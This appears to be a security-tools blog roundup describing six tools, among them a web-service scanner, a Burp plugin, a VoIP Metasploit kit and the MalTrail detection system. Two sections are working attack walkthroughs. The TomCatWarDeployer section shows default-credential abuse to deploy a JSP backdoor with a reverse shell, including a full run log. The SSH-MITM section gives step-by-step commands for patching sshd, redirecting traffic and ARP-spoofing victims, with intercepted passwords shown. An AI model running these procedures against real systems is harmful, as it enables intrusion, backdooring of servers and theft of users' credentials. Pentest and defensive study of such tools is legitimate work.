WSSAT - Web Service Security Assessment Tool

WSSAT - Web Service Security Assessment Tool

WSSAT is an open source web service security scanning tool which provides a dynamic environment to add, update or delete vulnerabilities by just editing its configuration files. 

This tool accepts WSDL address list as input file and for each service, it performs both static and dynamic tests against the security vulnerabilities.

It also makes information disclosure controls. With this tool, all web services could be analysed at once and the overall security assessment could be seen by the organization.

Objectives of WSSAT are to allow organizations:
Perform their web services security analysis at once
See overall security assessment with reports

Harden their web services

WSSAT’s main capabilities include:

Dynamic Testing:

• Insecure Communication - SSL Not Used
• Unauthenticated Service Method
• Error Based SQL Injection
• Cross Site Scripting
• XML Bomb
• External Entity Attack - XXE
• XPATH Injection
• Verbose SOAP Fault Message

Static Analysis:

• Weak XML Schema: Unbounded Occurrences
• Weak XML Schema: Undefined Namespace
• Weak WS-SecurityPolicy: Insecure Transport
• Weak WS-SecurityPolicy: Insufficient Supporting Token Protection
• Weak WS-SecurityPolicy: Tokens Not Protected

Information Leakage:

• Server or technology information disclosure

WSSAT’s main modules are:

• Parser
• Vulnerabilities Loader
• Analyzer/Attacker
• Logger
• Report Generator

The main difference of WSSAT is to create a dynamic vulnerability management environment instead of embedding the vulnerabilities into the code.

This project has been developed as Term Project at Middle East Technical University (METU), Software Management master program.

Download

TomCatWarDeployer: Apache Tomcat Auto WAR Deployment And Pwning Penetration Testing Tool

TomCatWarDeployer: Apache Tomcat Auto WAR deployment & Pwning Penetration Testing Tool..

Apache Tomcat auto WAR deployment & pwning penetration testing tool.

What is it?

This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy JSP Backdoor, as well as invoke it afterwards and provide nice shell (either via web gui, listening port binded on remote machine or as a reverse tcp payload connecting back to the adversary).

In practice, it generates JSP backdoor WAR package on-the-fly and deploys it at the Apache Tomcat Manager Application, using valid HTTP Authentication credentials that pentester provided (or custom ones, in the end, we all love tomcat:tomcat ).

Usage

As simple as providing server's address with port, as a IP:PORT pair. Here goes the help:

user$ python tomcatWarDeployer.py --help

    tomcatWarDeployer (v. 0.3)
    Apache Tomcat 6/7 auto WAR deployment & launching tool
    Mariusz B. / MGeeky '16

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

Usage: tomcatWarDeployer.py [options] server

server    Specifies server address. Please also include port after colon.

Options:
  -h, --help     show this help message and exit

  General options:
    -v, --verbose       Verbose mode.
    -s, --simulate      Simulate breach only, do not perform any offensive
                        actions.
    -G OUTFILE, --generate=OUTFILE
                        Generate JSP backdoor only and put it into specified
                        outfile path then exit. Do not perform any
                        connections, scannings, deployment and so on.
    -U USER, --user=USER
                        Tomcat Manager Web Application HTTP Auth username.
                        Default="tomcat"
    -P PASS, --pass=PASS
                        Tomcat Manager Web Application HTTP Auth password.
                        Default="tomcat"

Connection options:
    -H RHOST, --host=RHOST
                        Remote host for reverse tcp payload connection. When
                        specified, RPORT must be specified too. Otherwise,
                        bind tcp payload will be deployed listening on 0.0.0.0
    -p PORT, --port=PORT
                        Remote port for the reverse tcp payload when used with
                        RHOST or Local port if no RHOST specified thus acting
                        as a Bind shell endpoint.
    -u URL, --url=URL   Apache Tomcat management console URL. Default:
                        /manager/
    -t TIMEOUT, --timeout=TIMEOUT
                        Speciifed timeout parameter for socket object and
                        other timing holdups. Default: 10
Payload options:
    -R APPNAME, --remove=APPNAME
                        Remove deployed app with specified name. Can be used
                        for post-assessment cleaning
    -X PASSWORD, --shellpass=PASSWORD
                        Specifies authentication password for uploaded shell,
                        to prevent unauthenticated usage. Default: randomly
                        generated. Specify "None" to leave the shell
                        unauthenticated.
    -T TITLE, --title=TITLE
                        Specifies head>title for uploaded JSP WAR payload.
                        Default: "JSP Application"
    -n APPNAME, --name=APPNAME
                        Specifies JSP application name. Default: "jsp_app"
    -x, --unload        Unload existing JSP Application with the same name.
                        Default: no.
    -C, --noconnect     Do not connect to the spawned shell immediately. By
                        default this program will connect to the spawned
                        shell, specifying this option let's you use other
                        handlers like Metasploit, NetCat and so on.
    -f WARFILE, --file=WARFILE
                        Custom WAR file to deploy. By default the script will
generate own WAR file on-the-fly.

And sample usage on Kevgir 1 VM by canyoupwn.me running at 192.168.56.100:8080 :

user$ python tomcatWarDeployer.py -v -x -p 4449 -H 192.168.56.102 192.168.56.100:8080

    tomcatWarDeployer (v. 0.3)
    Apache Tomcat 6/7 auto WAR deployment & launching tool
    Mariusz B. / MGeeky '16

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

INFO: Reverse shell will connect to: 192.168.56.102:4449.
DEBUG: Browsing to "http://192.168.56.100:8080/manager/"... Creds: tomcat:tomcat
DEBUG: Apache Tomcat Manager Application reached & validated.
DEBUG: Generating JSP WAR backdoor code...
DEBUG: Preparing additional code for Reverse TCP shell
DEBUG: Generating temporary structure for jsp_app WAR at: 
"/tmp/tmpDhzo9I"
DEBUG: Working with Java at version: 1.8.0_60
DEBUG: Generating web.xml with servlet-name: "JSP Application"
DEBUG: Generating WAR file at: "/tmp/jsp_app.war"
DEBUG: added manifest
adding: files/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/web.xml(in = 547) (out= 253)(deflated 53%)
adding: files/META-INF/(in = 0) (out= 0)(stored 0%)
adding: files/META-INF/MANIFEST.MF(in = 68) (out= 67)(deflated 1%)
adding: index.jsp(in = 4684) (out= 1595)(deflated 65%)
DEBUG: WAR file structure:
DEBUG: /tmp/tmpDhzo9I
├── files
│   ├── META-INF
│   │   └── MANIFEST.MF
│   └── WEB-INF
│       └── web.xml
└── index.jsp

3 directories, 3 files
WARNING: Application with name: "jsp_app" is already deployed.
DEBUG: Unloading existing one...
DEBUG: Unloading application: "http://192.168.56.100:8080/jsp_app/"
DEBUG: Succeeded.
DEBUG: Deploying application: jsp_app from file: "/tmp/jsp_app.war"
DEBUG: Removing temporary WAR directory: "/tmp/tmpDhzo9I"
DEBUG: Succeeded, invoking it...
DEBUG: Spawned shell handling thread. Awaiting for the event...
DEBUG: Awaiting for reverse-shell handler to set-up
DEBUG: Establishing listener for incoming reverse TCP shell at 192.168.56.102:4449
DEBUG: Socket is binded to local port now, awaiting for clients...
DEBUG: Invoking application at url: "http://192.168.56.100:8080/jsp_app/"
DEBUG: Adding 'X-Pass: oHI9mPB0mOnZ' header for shell functionality authentication.
DEBUG: Incoming client: 192.168.56.100:54251
INFO: JSP Backdoor up & running on http://192.168.56.100:8080/jsp_app/
INFO: Happy pwning. Here take that password for web shell: 'oHI9mPB0mOnZ'
DEBUG: Connected with the shell: tomcat7@canyoupwnme

tomcat7@canyoupwnme $ id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)

tomcat7@canyoupwnme $ exit

The program will set-up a local listener for reverse-shell connection on the 192.168.56.102:4449 host (local host) as in the example above. Then, after invoking JSP Backdoor it will automatically connect with the local listener, resulting in shell being popped up. One can also skip -H parameter in order to go with bind shell functionality, whereas rather then setting local listener - the program will go and connect with remotely listening bind-shell.

Finally, the above invocation will result in the following JSP application accessible remotely via WEB:

JSP backdoor gui

As one can see, there is password needed for leveraging deployed backdoor, preventing thus unauthenticated access during conducted assessment.

Summing up, user has spawned WEB application providing WEB backdoor, authenticated via POST 'password' parameter that can be specified by user or randomly generated by the program. Then, the application upon receiving X-Pass header in the invocation phase, spawned reverse connection to our netcat handler. The HTTP header is being requested here in order to prevent user refreshing WEB gui and keep trying to bind or reverse connect. Also this makes use of authentication to reach that code.

That would be all I guess.

CHANGELOG

19.07.16: Version 0.3: Added bind-shell & Reverse-shell functionality to provide user with direct access to the shell.

TODO

1. Implement bind & reverse tcp payload functionality as well as some pty to interact with it
2. Finish implementing noconnect and connect functionality
3. Implement sort of communication authentication and encryption/encoding, to prevent flow of plain-text data through the wire/ether
4. Test it on tomcat8

Download

     

Vulners: Software Vulnerability Scanner Plugin For Burp Suite Professional

Vulners scanner Plugin Released  For Automatic Vulnerability Detection In Passive Scan mode

vulnersCom/burp-vulners-scanner Vulnerability scanner based on vulners.com search API

Burp Suite scanner plugin based on Vulners.com vulnerability database API

• Search fingerprints in http response (inspired by plugin "Software Version Reporter") and check found version in vulners.com vulnerability database
• [Experemental] Check unique URLs in vulners.com finding exploits for such pathsIf Vulners Plugin detects vulnerable software it will show you CVE, advisoroies and even applicable exploits!
  
  
   

  Requirements

  • Burp Suite - Professional Edition
  • Java 1.7
  • Maven

   

  Installation

  • Clone repository
  • From command line run
  • mvn package
  • find burp-vulners-scanner.jar in /target folder
  • open Burp Suite -> Extender -> Add -> path to plugin.jar

  
  

  Build

  Ready to install build burp-vulners-scanner.jar
  
  Software Vulnerability scanner plugin for Burp Suite Professional
  Main functionality:
  

  • Detect vulnerable software by discovered fingerprints in HTTP responses
  • Check unique urls finding exploits with such paths

  Download Burp Suite Plugin

   

SSH Man-In-The-Middle Penetration Testing Tool

SSH Man-In-The-Middle Penetration Testing Tool

This penetration testing tool allows an auditor to intercept SSH connections. 

A patch applied to the OpenSSH v7.5p1 source code causes it to act as a proxy between the victim and their intended SSH server; all plaintext passwords and sessions are logged to disk.

Of course, the victim's SSH client will complain that the server's key has changed. But because 99.99999% of the time this is caused by a legitimate action (OS re-install, configuration change, etc), many/most users will disregard the warning and continue on.

NOTE: Only run the modified sshd in a VM or container! Ad-hoc edits were made to the OpenSSH sources in critical regions, with no regard to their security implications. Its not hard to imagine these edits introduce serious vulnerabilities. Until the dependency on root privileges is removed, be sure to only run this code on throw-away VMs/containers.

To Do

This is the first release of this tool. While it is very useful as-is, there are nevertheless things to improve:

• Support SFTP MITM'ing.
• Add port forwarding support.
• Remove dependency on root privileges.
• Create wrapper script that detects when user is trying to use key authentication only, and de-spoof them automatically.

Initial Setup

1.) Install zlib and openssl headers:
sudo apt install zlib1g-dev libssl-dev

2.) Download OpenSSH v7.5p1 and verify its signature:
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/RELEASE_KEY.asc
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.5p1.tar.gz
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.5p1.tar.gz.asc
gpg --import RELEASE_KEY.asc
gpg --verify openssh-7.5p1.tar.gz.asc openssh-7.5p1.tar.gz

3.) Unpack the tarball, patch the sources, and compile it:
tar xzf openssh-7.5p1.tar.gz
patch -p0 < openssh-7.5p1-mitm.patch
mv openssh-7.5p1 openssh-7.5p1-mitm; cd openssh-7.5p1-mitm; ./configure --with-sandbox=no && make -j 10

4.) Create keys and setup environment:
sudo ssh-keygen -t ed25519 -f /usr/local/etc/ssh_host_ed25519_key < /dev/null
sudo ssh-keygen -t rsa -b 4096 -f /usr/local/etc/ssh_host_rsa_key < /dev/null
sudo useradd -m sshd && sudo useradd -m bogus && sudo chmod 0700 ~sshd ~bogus
sudo mkdir /var/empty; sudo cp ssh ~bogus/

Running The Attack

1.) Run sshd:
cd /path/to/openssh-7.5p1-mitm
sudo $PWD/sshd -f $PWD/sshd_config

2.) Enable IP forwarding:
sudo bash -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
sudo iptables -P FORWARD ACCEPT

3.) Allow connections to sshd and re-route forwarded SSH connections:
sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 22

4.) ARP spoof a target(s) (Protip: do NOT spoof all the things! Your puny network interface won't likely be able to handle an entire network's traffic all at once. Only spoof a couple IPs at a time):
arpspoof -r -t 192.168.x.1 192.168.x.5

5.) Monitor auth.log. Intercepted passwords will appear here:
sudo tail -f /var/log/auth.log

6.) Once a session is established, a full log of all input & output can be found in /home/bogus/session_*.txt.

Sample Results

Upon success, /var/log/auth.log will have lines that log the password, like this:

May 16 23:14:01 showmeyourmoves sshd[16798]: INTERCEPTED PASSWORD: hostname: [10.199.30.x]; username: [jdog]; password: [supercalifragilistic] [preauth]

Furthermore, the victim's entire SSH session can be found in/home/bogus/session_*.txt:

# cat /home/bogus/session_0.txt
Last login: Tue May 16 21:35:00 2017 from 10.50.22.x
OpenBSD 6.0-stable (GENERIC.MP) #12: Sat May  6 19:08:31 EDT 2017

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest version of the code.  With bug reports, please try to ensure that enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

jdog@jefferson ~ $ ppss
PID TT  STAT       TIME COMMAND
59264 p0  Ss      0:00.02 -bash (bash)
52132 p0  R+p     0:00.00 ps
jdog@jefferson ~ $ iidd
uid=1000(jdog) gid=1000(jdog) groups=1000(jdog), 0(wheel)
jdog@jefferson ~ $ sssshh  jjtteessttaa@@mmaaggiiccbbooxx
jtesta@magicbox's password: ROFLC0PTER!!1juan

Note that the characters in the user's commands appear twice in the file because the input from the user is recorded, as well as the output from the shell (which echoes characters back). Observe that when programs like sudo and ssh temporarily disable echoing in order to read a password, duplicate characters are not logged.

Download SSH-MITM

VIPROY - VoIP Pen-Test Kit for Metasploit Framework

VIPROY - VoIP Pen-Test Kit for Metasploit Framework

Viproy Voip Pen-Test Kit provides penetration testing modules for VoIP networks. It supports signalling analysis for SIP and Skinny protocols, IP phone services and network infrastructure. 

Viproy 2.0 is released at Blackhat Arsenal USA 2014 with TCP/TLS support for SIP, vendor extentions support, Cisco CDP spoofer/sniffer, Cisco Skinny protocol analysers, VOSS exploits and network analysis modules. Furthermore, Viproy provides SIP and Skinny development libraries for custom fuzzing and analyse modules.

Current Version and Updates

Current version: 4.1 (Requires ruby 2.1.X and Metasploit Framework Github Repo)
Pre-installed repo: https://github.com/fozavci/metasploit-framework-with-viproy

Worldwide Conference Talks

Black Hat USA 2016 - VoIP Wars: The Phreakers Awaken

• https://www.slideshare.net/fozavci/voip-wars-the-phreakers-awaken

Black Hat Europe 2015 - VoIP Wars: Destroying Jar Jar Lync

• http://www.slideshare.net/fozavci/voip-wars-destroying-jar-jar-lync-unfiltered-version

DEF CON 23 - The Art of VoIP Hacking Workshop Slide Deck

• http://www.slideshare.net/fozavci/the-art-of-voip-hacking-defcon-23-workshop

DEFCON 21 - VoIP Wars: Return of the SIP



Attacking SIP/VoIP Servers Using Viproy

Current Testing Modules

• SIP Register
• SIP Invite
• SIP Message
• SIP Negotiate
• SIP Options
• SIP Subscribe
• SIP Enumerate
• SIP Brute Force
• SIP Trust Hacking
• SIP UDP Amplification DoS
• SIP Proxy Bounce
• Skinny Register
• Skinny Call
• Skinny Call Forward
• CUCDM Call Forwarder
• CUCDM Speed Dial Manipulator
• MITM Proxy TCP
• MITM Proxy UDP
• Cisco CDP Spoofer
• Boghe VoIP Client INVITE PoC Exploit (New)
• Boghe VoIP Client MSRP PoC Exploit (New)
• SIP Message with INVITE Support (New)
• Sample SIP SDP Fuzzer (New)
• MSRP Message Tester with SIP INVITE Support (New)
• Sample MSRP Message Fuzzer with SIP INVITE Support (New)
• Sample MSRP Message Header Fuzzer with SIP INVITE Support (New)

Documentation

Installation

• Copy "lib" and "modules" folders' content to Metasploit root directory.
• Mixins.rb File (lib/msf/core/auxiliary/mixins.rb) should contains the following lines
• require 'msf/core/auxiliary/sip'
• require 'msf/core/auxiliary/skinny'
• require 'msf/core/auxiliary/msrp'

Download Viproy

MalTrail: Malicious Traffic Detection System Tool

MalTrail: Malicious Traffic Detection System Tool

Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists, where trail can be anything from domain name (e.g. zvpprsensinaix.[com] for Banjori malware), URL (e.g. http://109.162.38.120/harsh02.[exe] for known malicious executable), IP address (e.g. 185.130.5.231 for known attacker) or HTTP User-Agent header value (e.g. sqlmap for automatic SQL injection and database takeover tool).

Also, it uses (optional) advanced heuristic mechanisms that can help in discovery of unknown threats (e.g. new malware).

Features

• Uses multiple public blacklists (alientvault, autoshun, badips, sblam etc)
• Has extensive static trails for identification (domain names, URLs, IP addresses or User-Agent values)
• Optional heuristic mechanisms for detection of unknown threats
• Based on Traffic -> Sensor <-> Server <-> Client Architecture
• Web reporting interface.

Architecture

Maltrail is based on the Traffic -> Sensor <-> Server <-> Client architecture. Sensor(s) is a standalone component running on the monitoring node (e.g. Linux platform connected passively to the SPAN/mirroring port or transparently inline on a Linux bridge) or at the standalone machine (e.g. Honeypot) where it "monitors" the passing Traffic for blacklisted items/trails (i.e. domain names, URLs and/or IPs).

In case of a positive match, it sends the event details to the (central) Server where they are being stored inside the appropriate logging directory (i.e. LOG_DIR described in the Configuration section). If Sensor is being run on the same machine as Server (default configuration), logs are stored directly into the local logging directory. Otherwise, they are being sent via UDP messages to the remote server (i.e. LOG_SERVER described in the Configuration section).

Server's primary role is to store the event details and provide back-end support for the reporting web application. In default configuration, server and sensor will run on the same machine. So, to prevent potential disruptions in sensor activities, the front-end reporting part is based on the "Fat client" architecture (i.e. all data post-processing is being done inside the client's web browser instance). Events (i.e. log entries) for the chosen (24h) period are transferred to the Client, where the reporting web application is solely responsible for the presentation part. Data is sent toward the client in compressed chunks, where they are processed sequentially. The final report is created in a highly condensed form, practically allowing presentation of virtually unlimited number of events.

Note: Server component can be skipped altogether, and just use the standalone Sensor. In such case, all events would be stored in the local logging directory, while the log entries could be examined either manually or by some CSV reading application.

Quick start

The following set of commands should get your Maltrail Sensor up and running (out of the box with default settings and monitoring interface "any"):

sudo apt-get install git python-pcapy
git clone https://github.com/stamparm/maltrail.git
cd maltrail
sudo python sensor.py

To start the (optional) Server on same machine, open a new terminal and execute the following:

[[ -d maltrail ]] || git clone https://github.com/stamparm/maltrail.git
cd maltrail
python server.py

To test that everything is up and running execute the following:

ping -c 1 136.161.101.53
cat /var/log/maltrail/$(date +"%Y-%m-%d").log

To stop Sensor and Server instances (if running in background) execute the following:

sudo pkill -f sensor.py
pkill -f server.py

Requirements

To properly run the Maltrail, Python 2.6.x or 2.7.x is required, together with pcapy (e.g. sudo apt-get install python-pcapy). There are no other requirements, other than to run the Sensor component with the administrative/root privileges.

Download MalTrail